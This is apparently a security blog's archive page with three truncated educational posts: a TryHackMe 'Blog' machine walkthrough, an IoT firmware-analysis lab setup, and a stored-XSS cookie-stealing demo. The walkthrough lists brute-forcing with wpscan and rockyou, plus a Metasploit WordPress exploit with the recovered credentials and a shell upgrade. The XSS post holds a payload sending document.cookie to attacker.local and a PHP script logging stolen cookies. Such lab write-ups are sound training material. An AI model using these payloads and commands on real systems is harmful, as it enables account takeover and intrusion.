Posts

Showing posts from May, 2025

Blog Machine - Try Hack Me

Step 1: Gather Information: nmap scan
    Open Ports, Version, FTP, SMB, RDP
Step 2: Gather Information: Directory Enumeration
    gobuster dir -u http://10.10.126.45 -w /usr/share/wordlists/dirb/big.txt -s 200,204,301,302,307,308 --status-codes-blacklist "" -t 20 -o blog.th
Step 3: WPScan
    wpscan --url http://blog.thm/ --enumerate p --enumerate t --enumerate u > wpscan_output.txt
    cat
Step 4: Brute-force Username & Password
Step 5: Password taken from rockyou.txt
    wpscan --url http://blog.thm/ -P /root/Documents/Wordlists/rockyou.txt -U /root/usr.txt --verbose > UserEnumer.txt
Step 6: Metasploit
    use exploit/multi/http/wp_crop_rce
    set rhosts 10.10.109.33
    set username kwheel
    set password cutiepie1
    set LHOST <My_Machine_IP>
    run
    shell
    python -c 'import pty; pty.spawn("/bin/bash")'
    id
Step 7: Inside "Shell" - Walkthrough folder files access
    cd /home
    ls
    cd bjoel
    ls
    cat user.txt
    download /home/bjoel/Billy_Joe...

Lab Setup - IoT - Security Assessment Flow | Educational Purpose

IoT Security Assessment
Step 1: Install on your Linux machine the prerequisite tools:
    1. hexdump
       hexdump is a Unix command-line tool that displays the raw byte content of a file in hexadecimal (hex) and, optionally, ASCII format. It is commonly used for analyzing binary files, firmware, memory dumps, or for debugging data structures.
    2. binwalk + squashfs
       Binwalk is a forensic and reverse-engineering tool used primarily for analyzing and extracting firmware images. It is widely used in embedded device security testing, firmware analysis, and reverse engineering.
    3. firmadyne
       Firmadyne is an automated firmware emulation and dynamic analysis framework designed to help security researchers emulate, instrument, and analyze Linux-based firmware images, especially for embedded devices such as routers, IP cameras, and smart home devices.
Step 2: Get the device and extract the firmware file.
    Let's assume we have a Netgear IoT device, model number WNAP 320, extracted firmware.b...

Cookie Stealing via XSS Stored Vulnerability | Educational Purpose Only

Cookie Stealing via XSS Stored Vulnerability

Configuration:
    sudo nano /etc/hosts

Victim Application:
Step 1: Create and paste the code into the index.html file

    <!DOCTYPE html>
    <html>
    <head><title>Test</title></head>
    <body>
      <h1>Hello from test.local!</h1>
      <a onclick="document.location='http://attacker.local:8080/steal.php?cookie=' + escape(document.cookie);" href="#">Click me</a>
      <script>
        // Set a test cookie
        document.cookie = "session=ABC123";
      </script>
    </body>
    </html>

Run Command:
    sudo python3 -m http.server 80

Attacker Code:

    <?php
    if (isset($_GET['cookie'])) {
        file_put_contents("log.txt", $_GET['cookie'] . "\n", FILE_APPEND | LOCK_EX);
        header("Location: http://0.0.0.0/index.html");
        exit();
    }
    ?>

Save as steal.php

Run Command:
    sudo php -S 0.0.0.0:8080

Finally, we successfully stole t...